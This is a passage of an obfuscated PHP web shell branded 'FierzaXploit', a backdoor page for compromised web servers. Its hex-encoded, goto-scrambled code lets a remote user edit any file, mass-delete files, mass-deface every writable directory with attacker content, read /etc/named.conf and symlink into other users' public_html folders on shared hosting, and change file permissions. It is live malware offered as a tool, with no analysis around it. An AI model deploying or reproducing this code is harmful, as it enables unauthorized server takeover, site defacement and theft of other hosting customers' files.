bottom: 40px;
right: 50px;
text-decoration: none;
text-align: center;
line-height: 50px;
color:white;
}.bi-chevron-up{font-size: 20px;
line-height: 25px;
color:black;
}.home{margin-top: -15px;
}.home,.linknya{color: white !important;
text-decoration: none;
}}@media (min-width: 992px) {body {color: #fff;
overflow-x: hidden !important;
text-decoration: none;
width: 100%;
}.shell{width: 100%;
}.pembatas{margin-top: 11px !important;
}.uploader {background: 0 0 !important;
color: #fff;
}.tombol {margin-top: -30px;
width: 100%;
color: #fff;
}.file {width: 30%;
}.tools {visibility: hidden;
margin-left: -38px;
}.tambah {margin-top: 30px;
margin-bottom: 25px;
}.label {margin-top: 10px;
}.tambahdir {margin-top: 5px;
color: #fff;
width: 30%;
}.klik {width: 50%;
color: #fff;
}.about {margin-left: 6px;
}.tablenya {overflow: auto !important;
}.pembatas{margin-top: 25px;
}.up-icon{z-index: 9999;
position: fixed;
width: 30px;
height: 30px;
border-radius: 50%;
background: white;
bottom: 40px;
right: 50px;
text-decoration: none;
text-align: center;
line-height: 50px;
color:black;
}.bi-chevron-up{font-size: 20px;
line-height: 25px;
color:black;
}.home{margin-top: -15px;
}.home,.linknya{color: white !important;
text-decoration: none;
}}</style> <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script> </head> <body class="bg-dark animate__animated animate__fadeIn"> <br> <div class="shell container-fluid"> <center><<img class="gambar bg-dark border-dark" src="https://i.ibb.co/Z615hHn/guy-fawkes-mask.png" alt="" width="45" height="45" class="d-inline-block align-text-top"><br><label for="exampleFormControlInput1" class="text-white form-label">- FierzaXploit -<br>Simple,Responsive & Powerfull</label></center> <!-- navbar --> <nav class="navbar navbar-expand-lg navbar-light bg-dark"> <div class="container-fluid"> <h4 class="navbar-brand"> <b>{FierzaXploit }</b></br> </h4> <button class="btn btn-dark" type="button" data-bs-toggle="offcanvas" data-bs-target="#offcanvasExample" aria-controls="offcanvasExample"> <b><font><i class="bi bi-menu-up"></i></font> Menu</b> </button> <div class="offcanvas offcanvas-start" tabindex="-1" id="offcanvasExample" aria-labelledby="offcanvasExampleLabel"> <div class="offcanvas-header"> <h5 class="offcanvas-title" id="offcanvasExampleLabel"><b><font><i class="bi bi-menu-up"></i></font> Menu</b></h5> <button type="button" class="btn-close text-reset" data-bs-dismiss="offcanvas" aria-label="Close"></button> </div> <div class="offcanvas-body"> <div class="dropdown mt-3"> <button class="btn btn-light dropdown-toggle" type="button" id="dropdownMenuButton" data-bs-toggle="dropdown"> <i class="bi bi-gear-wide-connected"></i> Our Tools </button> <ul class="dropdown-menu" aria-labelledby="navbarDropdownMenuLink"> <li> <?php goto eRzg6;
xDPWm: NxF52: goto sbIS7;
tpRGg: if ($_GET["\x61\x6b\x73\151"] == "\145\144\x69\x74") { if (isset($_POST["\163\x61\x76\145"])) { $fp = fopen($_GET["\144\x69\x72\x66"], "\167");
$hasil = fwrite($fp, $_POST["\x73\x72\x63"]);
if ($hasil) { echo "\74\163\x63\x72\x69\x70\x74\76\167\x69\x6e\144\157\167\56\x6c\157\x63\x61\x74\151\157\156\75\x27\77\x70\x61\164\150\x3d" . $path . "\47\73\x61\154\x65\x72\x74\x28\x27\x53\145\x6c\x61\x6d\141\164\x20\101\x6e\x64\x61\x20\102\x65\x72\x68\141\163\x69\x6c\40\115\x65\156\x67\x2d\145\x64\151\164\40\106\x69\154\145\x27\51\x3b\74\57\x73\x63\162\x69\x70\x74\76";
} else { echo "\x3c\163\x63\162\151\160\x74\x3e\167\151\156\x64\x6f\167\x2e\x6c\x6f\143\x61\x74\151\157\x6e\75\x27\x3f\160\x61\164\150\75" . $path . "\x27\73\141\x6c\145\162\x74\x28\x27\115\141\141\x66\x20\101\156\144\141\x20\107\141\147\141\x6c\x20\x4d\145\x6e\147\x2d\145\x64\151\164\x20\106\151\x6c\x65\x27\51\73\74\x2f\163\143\x72\151\160\x74\76";
} } echo "\x3c\x64\151\166\x20\x63\x6c\x61\163\x73\x3d\x27\x63\x6f\156\164\141\x69\x6e\x65\x72\x20\x61\x6c\x65\162\x74\x27\76\40\x3c\143\145\x6e\164\x65\162\76\x3c\x68\64\40\143\154\x61\163\163\75\x22\164\145\170\x74\55\167\150\151\x74\x65\42\76\173\x45\x64\151\164\40\x46\151\x6c\145\40\x7d\74\57\150\x34\x3e\x3c\57\x63\x65\156\x74\145\162\x3e\x20\x3c\146\157\162\155\40\155\x65\x74\150\x6f\x64\75\47\120\x4f\123\x54\x27\76\x20\74\x64\x69\x76\x20\143\154\x61\163\x73\x3d\x22\155\142\55\x33\42\x3e\40\74\154\x61\142\145\x6c\x20\146\157\x72\75\x22\145\x78\x61\x6d\x70\x6c\145\106\157\x72\x6d\x43\x6f\156\164\162\157\x6c\x54\x65\x78\x74\x61\x72\x65\x61\x31\42\40\143\154\x61\x73\x73\75\42\x74\145\170\x74\55\167\x68\x69\x74\145\40\x66\157\x72\x6d\55\154\x61\x62\145\154\42\x3e\x43\x6f\x64\145\40\x3a\74\57\154\x61\142\x65\x6c\x3e\x20\74\x74\145\170\x74\141\162\x65\141\40\143\154\141\163\163\x3d\42\x66\x6f\x72\155\55\143\x6f\x6e\164\162\x6f\x6c\42\x20\151\x64\x3d\x22\x65\170\141\x6d\x70\x6c\x65\x46\157\162\155\x43\x6f\x6e\x74\x72\x6f\x6c\x54\145\170\x74\x61\162\145\x61\x31\x22\x20\x72\157\x77\x73\x3d\x22\x32\x30\x22\40\x6e\141\x6d\145\75\x22\163\162\x63\x22\76" . htmlspecialchars(file_get_contents($_GET["\144\x69\x72\x66"])) . "\74\57\x74\x65\x78\164\141\162\145\141\76\74\141\40\150\x72\145\146\x3d\x22\77\110\157\155\145\42\x20\x74\171\160\145\75\42\142\165\x74\164\157\x6e\x22\x20\143\x6c\141\163\x73\x3d\42\164\x75\164\x75\x70\x20\x62\164\x6e\x2d\x63\154\x6f\163\x65\x22\x20\144\x61\164\x61\x2d\x62\x73\55\144\x69\163\155\151\x73\163\75\x22\141\x6c\145\162\x74\x22\x20\x61\x72\x69\141\x2d\154\141\x62\145\154\75\42\x43\154\157\x73\x65\42\76\x3c\57\141\x3e\40\x3c\x2f\144\151\x76\76\x20\x3c\x62\165\164\164\157\x6e\40\x6e\x61\x6d\145\x3d\42\163\141\166\x65\42\40\143\x6c\141\x73\x73\x3d\42\x74\157\155\x62\157\154\x20\142\164\x6e\x20\x62\x74\156\55\x6f\x75\x74\x6c\151\x6e\x65\x2d\x73\x65\x63\157\x6e\x64\141\162\171\42\40\x74\171\160\x65\x3d\42\x73\165\142\x6d\x69\164\42\x3e\x53\151\155\160\x61\x6e\74\x2f\x62\165\164\164\157\x6e\76\40\x3c\57\146\157\162\x6d\x3e\x20\x3c\142\x72\x3e\40\x3c\142\x75\164\164\157\x6e\40\164\171\x70\x65\75\42\x62\165\x74\164\157\x6e\x22\40\x63\154\x61\163\163\75\42\x74\x6f\155\x62\x6f\154\x20\142\x74\x6e\40\x62\164\156\x2d\144\x61\156\x67\145\x72\x22\40\x64\x61\x74\x61\x2d\x62\163\x2d\x64\x69\163\x6d\151\163\163\75\x22\141\154\x65\x72\x74\x22\40\141\162\x69\141\x2d\154\141\x62\x65\x6c\75\42\103\154\157\x73\x65\42\76\x43\141\156\143\x65\x6c\x3c\x2f\x62\165\x74\x74\157\x6e\x3e\40\74\57\144\151\166\x3e";
} goto Pm5Bg;
V0tPI: aMmZL: goto Lm29W;
EOI1o: if ($_GET["\x61\153\163\151"] == "\155\141\163\163\144\145\154") { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir);
foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}";
$lokasi = $dirc . "\57" . $namafile;
if ($dirb === "\56") { if (file_exists("{$dir}\57{$namafile}")) { unlink("{$dir}\57{$namafile}");
} } elseif ($dirb === "\56\56") { if (file_exists('' . dirname($dir) . "\x2f{$namafile}")) { unlink('' . dirname($dir) . "\x2f{$namafile}");
} } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "{$lokasi}\40\x3e\x20\x54\x65\x72\150\x61\160\x75\x73\12";
unlink($lokasi);
$massdel = hapus_massal($dirc, $namafile);
} } } } } } } if ($_POST["\163\x74\x61\x72\164"]) { echo "\x3c\x74\145\170\164\141\x72\145\141\x20\143\154\x61\x73\163\x3d\x27\146\157\x72\155\x2d\x63\x6f\156\164\162\x6f\154\x27\40\x72\x6f\x77\x73\75\x27\x38\47\x20\x64\x69\163\141\142\154\x65\x64\x3d\x27\144\151\x73\x61\142\154\145\144\47\76";
hapus_massal($_POST["\144\137\x64\151\162"], $_POST["\x64\137\146\x69\x6c\145"]);
echo "\74\x2f\x74\x65\170\164\141\162\145\x61\x3e\x3c\141\40\x68\162\x65\146\x3d\x27\77\x64\x69\x72\75{$dir}\x27\x20\x63\x6c\141\163\163\x3d\x27\142\x74\x6e\40\142\x74\156\55\x69\x6e\146\157\x20\x62\164\156\x2d\142\x6c\157\143\153\x20\x6d\164\x2d\x33\47\76\113\145\x6d\142\x61\x6c\x69\x3c\57\141\76";
} else { echo "\x3c\143\145\x6e\x74\145\x72\x3e\x3c\x70\x3e\x7b\x4d\141\163\x73\40\x44\x65\154\x65\164\145\x20\175\74\x2f\x70\x3e\74\x2f\143\145\156\164\x65\x72\76\x20\x3c\146\x6f\x72\x6d\40\x6d\x65\x74\x68\157\144\75\x27\160\157\x73\164\47\76\x20\x3c\x70\x3e\74\151\40\143\154\141\163\x73\x3d\47\146\x61\x20\146\141\55\146\157\x6c\144\x65\x72\47\76\x3c\57\x69\76\x20\x4c\x6f\153\x61\x73\151\74\57\160\76\x20\74\x69\156\160\x75\x74\x20\x74\171\160\x65\75\x27\x74\145\x78\164\47\40\156\141\155\145\75\x27\144\137\x64\x69\x72\47\40\166\x61\154\x75\145\75\47{$dir}\x27\x20\143\154\141\x73\163\75\47\x66\x6f\162\x6d\x2d\143\x6f\x6e\164\x72\157\154\47\x3e\x3c\142\x72\x3e\40\74\160\76\x3c\x69\x20\143\154\141\x73\163\40\75\47\146\141\40\146\141\55\x66\151\x6c\x65\x27\x3e\x3c\57\x69\76\40\116\x61\155\141\40\x46\x69\154\x65\74\x2f\160\x3e\40\74\151\156\160\x75\x74\40\x74\x79\x70\145\75\x27\x74\x65\x78\x74\x27\40\156\x61\x6d\x65\75\47\144\137\146\151\x6c\145\x27\40\160\154\141\x63\x65\150\x6f\154\144\x65\162\75\x27\151\156\144\145\x78\56\160\x68\x70\47\40\143\x6c\x61\x73\x73\x3d\x27\146\x6f\x72\x6d\x2d\x63\x6f\x6e\164\x72\157\154\x27\x3e\74\x62\x72\76\x20\x3c\151\x6e\160\165\x74\x20\x74\x79\160\x65\x3d\x27\163\x75\142\155\151\x74\x27\x20\156\141\x6d\x65\x3d\x27\163\x74\x61\162\164\x27\40\x76\141\154\165\x65\75\x27\x48\141\x70\165\x73\x27\x20\x63\x6c\x61\x73\x73\75\47\142\x74\x6e\40\142\164\156\55\x64\141\156\147\x65\x72\x20\x66\157\162\x6d\55\x63\x6f\156\164\x72\x6f\154\x27\x3e\40\x3c\142\x72\x3e\74\x62\x72\76\40\74\x2f\x66\157\x72\x6d\x3e";
} } goto XQB_K;
XoW0k: goto z5WeP;
goto mc16c;
IptFT: $path = str_replace("\134", "\x2f", $path);
goto O5nm1;
u9i_V: ?>
</li> </div> </div> </div> <?php goto AZYII;
xfMt2: goto zCF_D;
goto bdWeU;
Ybt26: echo "\74\x66\x6f\156\x74\x20\143\x6f\x6c\157\162\x3d\47\x77\x68\x69\x74\145\x27\x20\163\x69\172\145\75\x27\65\47\76\74\x61\40\x63\154\x61\163\x73\x3d\47\164\x65\x78\x74\55\167\150\x69\x74\x65\x20\x74\145\x78\x74\55\144\x65\x63\x6f\x72\141\x74\x69\x6f\x6e\x2d\156\x6f\x6e\x65\47\40\150\162\x65\146\x3d\47\150\x74\164\160\163\72\x2f\x2f\147\151\164\150\x75\x62\x2e\143\157\x6d\x2f\106\x69\x65\162\x7a\x61\x45\162\151\x65\172\x2f\115\151\156\151\55\123\x68\145\154\154\55\102\x61\x63\153\x64\x6f\x6f\x72\x27\76\74\151\x20\x63\154\x61\x73\163\x3d\42\142\x69\x20\142\151\55\147\x69\x74\x68\165\142\x22\76\74\57\151\76\x3c\x2f\x61\x3e\40\x3c\x69\x20\143\154\141\x73\163\x3d\x22\x62\x69\40\x62\x69\55\x66\x61\143\x65\x62\157\x6f\x6b\x22\76\74\x2f\151\76\40\74\151\40\143\x6c\x61\x73\163\x3d\x22\x62\151\40\142\x69\55\151\156\x73\164\141\147\x72\x61\x6d\42\x3e\x3c\x2f\x69\76\74\x2f\x66\x6f\x6e\164\x3e\74\146\x6f\156\164\40\143\157\154\157\x72\75\x27\167\150\x69\x74\145\47\x3e\x3c\150\162\40\x77\x69\144\x74\150\x3d\47\x35\65\45\x27\76\x3c\x2f\x66\157\x6e\164\76\x3c\x62\162\76\74\142\x72\x3e\x3c\x70\40\x63\154\141\163\x73\75\x22\151\156\146\x6f\42\76\104\145\163\151\147\156\x20\46\x20\x44\x65\166\x65\154\x6f\x70\145\144\40\102\x79\40\106\x69\145\162\172\141\x58\160\x6c\x6f\151\x74\40\x3c\142\162\76\x20\103\157\x70\171\162\151\x67\x68\164\40\x26\x63\x6f\160\171\x3b";
goto gDINn;
bdWeU: TVTRq: goto ylXBo;
A5_JB: goto NxF52;
goto Y9kzk;
evrxU: goto UPaVK;
goto cLP65;
EnfMF: if ($_GET["\141\153\x73\151"] == "\144\x65\154\x65\164\145") { if (is_dir($_GET["\x64\151\x72\146"])) { if (is_writable($path)) { rmdir($_GET["\156\x61\155\x61\137\146\x69\x6c\x65"]);
echo "\74\x73\143\x72\x69\160\164\x3e\x61\x6c\x65\162\x74\x28\47\123\x65\154\141\155\x61\164\x20\x41\156\x64\x61\40\x42\145\x72\150\141\163\x69\154\40\x4d\145\x6e\x2d\x64\x65\x6c\x65\164\x65\40\106\x6f\154\144\x65\162\x27\x29\x3b\x77\151\156\144\x6f\x77\56\x6c\x6f\143\141\164\x69\157\x6e\x3d\47\77\x70\x61\164\150\75" . $path . "\x27\74\57\x73\x63\x72\151\x70\x74\x3e";
} else { echo "\74\163\143\x72\151\x70\x74\x3e\141\154\145\162\x74\x28\x27\x4d\x61\141\146\x20\x41\x6e\144\141\x20\x47\x61\147\141\154\x20\x4d\x65\156\55\144\145\154\145\164\145\40\x46\x6f\154\144\x65\x72\47\x29\74\x2f\163\x63\x72\151\160\x74\x3e";
} } if (is_file($_GET["\144\x69\x72\x66"])) { if (unlink($_GET["\x6e\141\155\x61\x5f\146\151\154\145"])) { echo "\x3c\x73\x63\x72\x69\160\x74\76\x61\x6c\145\x72\164\x28\x27\x53\145\154\x61\x6d\x61\x74\x20\x41\x6e\x64\141\x20\x42\x65\x72\150\x61\x73\x69\x6c\x20\115\x65\156\x2d\144\x65\x6c\x65\164\x65\40\106\x69\154\145\47\51\x3b\x77\x69\x6e\144\x6f\167\56\x6c\x6f\143\x61\164\151\157\156\75\47\x3f\160\x61\164\x68\75" . $path . "\47\x3b\74\x2f\x73\143\162\151\160\164\76";
} else { echo "\x3c\x73\x63\x72\151\x70\x74\76\x61\x6c\145\x72\164\50\x27\115\141\141\146\x20\x41\156\144\141\x20\x47\141\147\x61\x6c\40\115\145\x6e\x2d\144\145\154\x65\164\x65\40\106\x69\154\145\x27\x29\73\x77\x69\x6e\144\157\167\x2e\x6c\157\x63\141\164\151\157\x6e\75\x27\77\160\141\164\x68\x3d" . $path . "\x27\x3b\x3c\x2f\163\143\162\151\160\164\76";
} } } goto AfZqn;
gmSid: goto vM0sT;
goto hWKWE;
pyHpb: iY62q: goto hS0Pn;
sbIS7: if ($_GET["\x61\x6b\163\151"] == "\x73\171\155\x6c\x69\156\153") { if (!is_file("\x6e\141\x6d\145\144\x2e\164\170\164")) { $d00m = @file("\x2f\x65\x74\x63\57\x6e\x61\155\145\144\56\143\x6f\156\146");
} else { $d00m = @file("\156\x61\x6d\x65\x64\56\x74\x78\164");
} if (!$d00m) { echo "\x3c\x63\x65\x6e\164\145\x72\x3e\40\74\142\162\x2f\x3e\x20\x3c\x66\x6f\156\x74\40\143\157\154\x6f\x72\75\x27\162\145\x64\47\76\x47\x61\147\x61\154\x20\115\145\x6d\142\141\x63\x61\40\57\x65\164\x63\57\156\x61\155\145\x64\x2e\x63\x6f\x6e\146\x3c\57\x66\x6f\x6e\x74\76\40\74\142\x72\57\x3e\x3c\x62\x72\57\76\x3c\57\x63\145\156\164\145\162\x3e";
} else { echo "\74\x63\x65\156\x74\145\162\x3e\40\74\144\x69\166\40\x63\x6c\141\163\163\75\x27\x74\155\x70\x27\x3e\x3c\57\143\145\x6e\164\145\162\76\40\74\x74\x61\142\154\145\40\141\x6c\x69\x67\x6e\x3d\47\143\145\156\164\x65\162\x27\40\x77\151\x64\164\150\75\47\61\60\60\45\47\x3e\40\x3c\164\150\x65\141\144\40\143\x6c\x61\163\x73\x3d\x27\142\147\x2d\x69\156\x66\157\x27\76\40\x3c\x74\x68\76\x44\157\155\141\x69\x6e\x73\x3c\57\164\x68\76\40\74\x74\150\x3e\x55\163\x65\162\x73\x3c\x2f\164\150\76\40\x3c\164\150\76\163\x79\x6d\154\x69\x6e\153\x20\74\57\164\150\76\40\x3c\x2f\x74\x68\145\x61\x64\x3e";
foreach ($d00m as $dom) { if (eregi("\172\157\x6e\x65", $dom)) { preg_match_all("\43\172\157\156\x65\x20\x22\x28\x2e\52\x29\x22\x23", $dom, $domsws);
flush();
if (strlen(trim($domsws[1][0])) > 2) { $user = posix_getpwuid(@fileowner("\x2f\x65\x74\x63\x2f\x76\x61\x6c\151\x61\163\x65\x73\57" . $domsws[1][0]));
flush();
$site = $user["\x6e\141\155\145"];
@symlink("\57", "\x73\x79\x6d\x2f\162\157\x6f\164");
$site = $domsws[1][0];
$ir = "\x69\x72";
$il = "\151\x6c";
if (preg_match("\x2f\56\136{$ir}\57", $domsws[1][0]) or preg_match("\x2f\x2e\x5e{$il}\x2f", $domsws[1][0])) { $site = "\x2e{$domsws["\x31"]}\x5b\x30\135\x2e";
} echo "\40\x3c\x74\x72\x3e\x20\74\x74\x64\x3e\40\x3c\141\40\x74\141\162\x67\145\x74\x3d\x27\x5f\142\154\141\x6e\153\x27\40\x68\162\x65\146\75\150\164\164\x70\72\57\x2f\167\x77\167\x2e" . $domsws[1][0] . "\x2f\76" . $site . "\x20\74\x2f\x61\76\40\x3c\57\164\x64\76\x20\74\164\144\76\x20" . $user["\x6e\141\x6d\145"] . "\x20\74\x2f\x74\144\x3e\40\74\x74\144\x3e\40\x3c\141\40\x68\x72\145\x66\75\x27\163\171\x6d\x2f\x72\x6f\x6f\164\57\150\x6f\x6d\x65\x2f" . $user["\x6e\x61\x6d\145"] . "\x2f\x70\165\142\x6c\151\x63\137\150\x74\x6d\154\47\40\164\141\x72\147\x65\x74\x3d\47\x5f\x62\154\141\x6e\x6b\47\x3e\123\171\x6d\154\x69\x6e\153\x3c\x2f\141\76\x20\x3c\x2f\x74\144\x3e\x20\x3c\x2f\164\162\76";
flush();
flush();
} } } echo "\74\57\x74\141\142\x6c\x65\76\x20\74\57\144\151\x76\x3e\x3c\x62\162\x3e\x3c\142\x72\76";
} } goto dHbjl;
eAO7y: AauIZ: goto Y4BNk;
z4nNL: kADJW: goto IorZ4;
PNGUy: UWzQG: goto tX3bQ;
sT0Km: goto qtcK6;
goto l9LlZ;
sI5sQ: if ($_GET["\x61\153\163\x69"] == "\155\x61\163\163\144\145\x66\141\x63\x65") { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir);
foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}";
$lokasi = $dirc . "\x2f" . $namafile;
if ($dirb === "\56") { file_put_contents($lokasi, $isi_script);
} elseif ($dirb === "\x2e\56") { file_put_contents($lokasi, $isi_script);
} else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\x42\145\x72\150\x61\x73\x69\x6c\x20\75\x3e\40{$lokasi}\xa";
file_put_contents($lokasi, $isi_script);
$MassDeface = tipe_massal($dirc, $namafile, $isi_script);
} } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir);
foreach ($dira as $dirb) { $dirc = "{$dir}\57{$dirb}";
$lokasi = $dirc . "\57" . $namafile;
if ($dirb === "\x2e") { file_put_contents($lokasi, $isi_script);
} elseif ($dirb === "\x2e\x2e") { file_put_contents($lokasi, $isi_script);
} else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\x42\145\x72\x68\141\x73\151\154\x20\x3d\76\x20{$dirb}\x2f{$namafile}\12";
file_put_contents($lokasi, $isi_script);
} } } } } } if ($_POST["\163\164\x61\162\164"]) { echo "\74\x74\145\x78\164\x61\x72\x65\141\40\143\154\141\163\163\75\x27\146\157\x72\155\x2d\x63\x6f\156\x74\162\x6f\x6c\47\x20\x72\157\x77\163\x3d\47\70\47\x20\144\151\163\x61\142\154\145\144\75\x27\x64\151\x73\141\x62\x6c\x65\x64\x27\76";
if ($_POST["\x74\151\x70\x65"] == "\x6d\x61\150\x61\x6c") { tipe_massal($_POST["\144\137\144\x69\162"], $_POST["\144\137\146\x69\154\145"], $_POST["\163\x63\x72\151\160\x74"]);
} elseif ($_POST["\x74\151\x70\145"] == "\155\165\162\141\150") { tipe_biasa($_POST["\x64\x5f\144\151\x72"], $_POST["\x64\x5f\146\x69\x6c\x65"], $_POST["\163\143\x72\151\x70\x74"]);
} echo "\x3c\x2f\x74\x65\x78\164\141\x72\145\x61\76\x3c\141\x20\150\162\145\x66\75\47\x3f\x64\x69\162\75{$dir}\x27\x20\x63\x6c\141\163\x73\75\x27\x62\164\156\40\x62\x74\156\55\151\x6e\x66\157\40\x62\164\x6e\55\x62\154\x6f\x63\x6b\x20\155\164\55\x33\47\76\113\145\x6d\142\x61\154\x69\74\x2f\x61\76";
} else { echo "\x3c\146\x6f\x72\x6d\x20\155\145\x74\x68\x6f\144\75\47\x70\157\x73\x74\x27\76\40\x3c\x63\145\156\x74\x65\x72\x3e\40\x3c\160\x3e\173\115\141\x73\163\40\x44\x65\146\x61\143\145\x20\175\74\57\x70\x3e\x20\x3c\151\156\160\x75\x74\40\151\144\x3d\47\x74\x6f\x67\147\154\145\55\x6f\156\x27\40\143\154\x61\163\x73\x3d\x27\x74\157\147\x67\154\x65\40\x74\157\147\147\x6c\x65\55\154\x65\146\164\47\40\x6e\x61\155\145\x3d\47\x74\151\x70\x65\47\x20\166\x61\x6c\x75\145\75\47\x6d\165\x72\x61\150\47\40\164\171\x70\x65\x3d\x27\162\141\x64\151\x6f\47\40\143\x68\145\x63\x6b\145\144\x3e\40\x3c\154\x61\142\145\x6c\x20\146\x6f\162\75\47\164\157\147\147\x6c\x65\55\x6f\156\x27\x20\x63\x6c\141\x73\x73\x3d\x27\142\165\x74\x6e\47\x3e\102\151\141\163\x61\x3c\x2f\154\x61\142\x65\x6c\76\x20\74\151\156\160\x75\164\x20\151\x64\x3d\x27\164\157\x67\147\x6c\145\x2d\157\x66\x66\47\40\x63\154\x61\x73\163\75\x27\164\157\x67\147\154\x65\40\x74\157\x67\x67\154\x65\x2d\162\x69\x67\150\x74\47\x20\156\141\x6d\145\75\47\164\151\160\145\x27\40\166\141\x6c\165\145\x3d\47\x6d\x61\150\x61\154\47\x20\x74\x79\160\x65\x3d\47\162\x61\144\x69\x6f\x27\76\x20\x3c\x6c\141\142\145\x6c\x20\146\157\162\x3d\x27\x74\x6f\x67\147\x6c\x65\x2d\157\146\146\47\x20\x63\x6c\x61\163\x73\75\47\142\x75\164\156\x27\x3e\x4d\141\x73\x61\154\x3c\57\154\x61\x62\145\154\76\40\74\x2f\x63\x65\x6e\x74\x65\x72\76\x3c\150\162\x3e\40\74\x70\76\x3c\151\x20\143\154\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\55\x66\157\x6c\x64\145\x72\47\76\74\57\151\76\40\114\x6f\x6b\141\x73\x69\74\57\160\x3e\40\74\151\x6e\x70\165\x74\40\x74\171\x70\145\75\47\x74\x65\170\x74\x27\x20\156\x61\x6d\x65\x3d\x27\x64\137\144\151\162\x27\x20\x76\x61\154\x75\x65\x3d\47{$dir}\x27\40\x63\154\x61\163\x73\x3d\47\x66\x6f\x72\155\55\x63\157\x6e\164\x72\x6f\154\47\x3e\74\142\162\x3e\40\x3c\x70\76\74\x69\x20\x63\154\x61\163\x73\x20\x3d\47\146\x61\40\146\x61\55\x66\x69\154\x65\47\76\x3c\57\x69\x3e\40\116\x61\155\x61\x20\x46\x69\154\145\x3c\x2f\160\76\40\x3c\151\156\x70\165\x74\40\164\x79\160\145\75\47\164\145\170\164\47\x20\x6e\141\155\x65\x3d\47\x64\x5f\146\151\154\145\x27\40\160\x6c\x61\x63\145\x68\x6f\x6c\144\145\162\75\47\x69\156\x64\x65\170\56\160\150\x70\47\x20\143\x6c\x61\x73\x73\75\47\x66\x6f\162\155\55\143\157\156\164\x72\157\x6c\47\76\74\142\162\x2f\76\x20\x3c\x70\76\74\151\x20\x63\154\x61\x73\163\x20\75\47\x66\141\40\146\x61\55\146\151\154\145\x27\x3e\74\57\x69\76\x20\x49\x73\x69\x20\x46\x69\154\145\x3c\x2f\160\76\x20\74\x74\x65\x78\164\x61\x72\145\x61\x20\x6e\141\x6d\145\x3d\47\163\x63\162\x69\x70\x74\47\40\x63\x6c\x61\x73\163\x3d\x27\x66\157\x72\155\55\143\157\x6e\164\x72\157\154\x27\x20\x72\157\x77\163\x3d\x27\65\47\40\160\x6c\x61\x63\x65\150\157\154\x64\x65\x72\x3d\47\110\x61\143\x6b\145\144\x20\x42\171\40\x4d\162\x2e\x4d\x46\63\x33\47\x3e\74\57\164\145\170\164\x61\x72\145\141\76\x3c\x62\x72\x2f\x3e\x20\74\151\x6e\160\x75\x74\x20\x74\x79\160\145\75\x27\x73\x75\142\155\x69\164\47\x20\156\x61\155\x65\x3d\47\163\x74\x61\x72\164\47\x20\166\x61\x6c\165\145\75\x27\x4d\141\x73\163\x20\x44\x65\x66\141\143\145\47\x20\x63\154\141\163\163\x3d\47\142\x74\x6e\x20\x62\164\x6e\x2d\144\141\156\x67\x65\x72\x20\146\157\x72\x6d\x2d\x63\x6f\156\164\162\x6f\154\47\76\x3c\x62\162\x2f\x3e\40\74\142\162\x3e\x3c\x62\x72\76\40\74\x2f\146\157\162\155\76";
} } goto HjlHJ;
fth0D: goto Bec33;
goto K9M6v;
oa08o: goto TkSsH;
goto NHUP1;
o3y5R: goto x7V9J;
goto PV003;
KQsIO: P0QKh: goto XXtIF;
ey9Tt: Ck2ZP: goto pEM73;
uuJvA: WDevt: goto nh8w_;
hS0Pn: ob_start();
goto xfMt2;
tX3bQ: if ($_GET["\141\153\163\x69"] == "\143\150\x6d\x6f\144") { if (isset($_POST["\147\x61\x6e\164\151"])) { if (chmod($_GET["\156\x61\155\x61\137\x66\x69\154\145"], $_POST["\x70\145\162\155"])) { echo "\x3c\x73\143\162\151\160\x74\x3e\167\x69\x6e\144\x6f\x77\56\x6c\x6f\143\x61\164\151\157\156\75\x27\x3f\160\141\x74\x68\75" . $path . "\47\x3b\141\x6c\145\162\x74\x28\47\x53\165\153\x73\x65\163\47\51\74\x2f\x73\143\162\151\x70\x74\x3e";
} else { echo "\74\x73\x63\x72\151\160\x74\x3e\x77\x69\156\144\157\x77\56\154\x6f\143\141\164\x69\157\x6e\x3d\47\77\x70\141\164\x68\75" . $path . "\x27\x3b\x61\x6c\145\x72\x74\x28\47\x47\x61\147\141\x6c\41\x21\x21\x27\51\x3c\x2f\163\143\162\x69\160\x74\76";
} } echo "\x3c\x64\x69\166\x20\x63\154\x61\163\163\75\42\141\154\145\162\164\x22\x3e\74\143\145\x6e\x74\x65\x72\76\x3c\x68\x34\40\x63\154\x61\163\163\x3d\x22\x74\x65\170\x74\55\167\x68\x69\x74\x65\42\76\173\x47\141\x6e\164\x69\40\120\145\x72\155\x69\x73\163\x69\157\156\x20\x7d\74\57\150\x34\x3e\x3c\57\143\x65\x6e\164\145\x72\76\40\x3c\x66\157\x72\x6d\40\x6d\145\x74\x68\157\144\x3d\x22\120\117\x53\x54\42\x3e\40\x3c\144\x69\x76\x20\143\x6c\x61\163\163\x3d\x22\155\142\x2d\x33\x22\x3e\x20\x3c\154\141\142\x65\x6c\40\146\x6f\162\75\x22\145\170\141\155\x70\x6c\x65\x46\157\162\155\103\x6f\156\164\x72\x6f\x6c\111\156\x70\165\x74\61\42\40\x63\x6c\141\x73\x73\x3d\x22\x74\145\170\164\x2d\167\150\151\164\x65\x20\x66\x6f\x72\x6d\55\x6c\x61\142\145\x6c\x22\76\x50\x65\x72\x6d\x69\163\163\x69\157\156\x20\x3a\x3c\57\x6c\x61\142\x65\154\x3e\40\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\160\145\75\x22\164\x65\170\164\x22\x20\x6e\141\155\x65\75\x22\x70\x65\x72\x6d\42\x20\166\x61\154\165\145\x3d\x22" . substr(sprintf("\x25\157", fileperms($_GET["\x64\151\162\146"])), -4) . 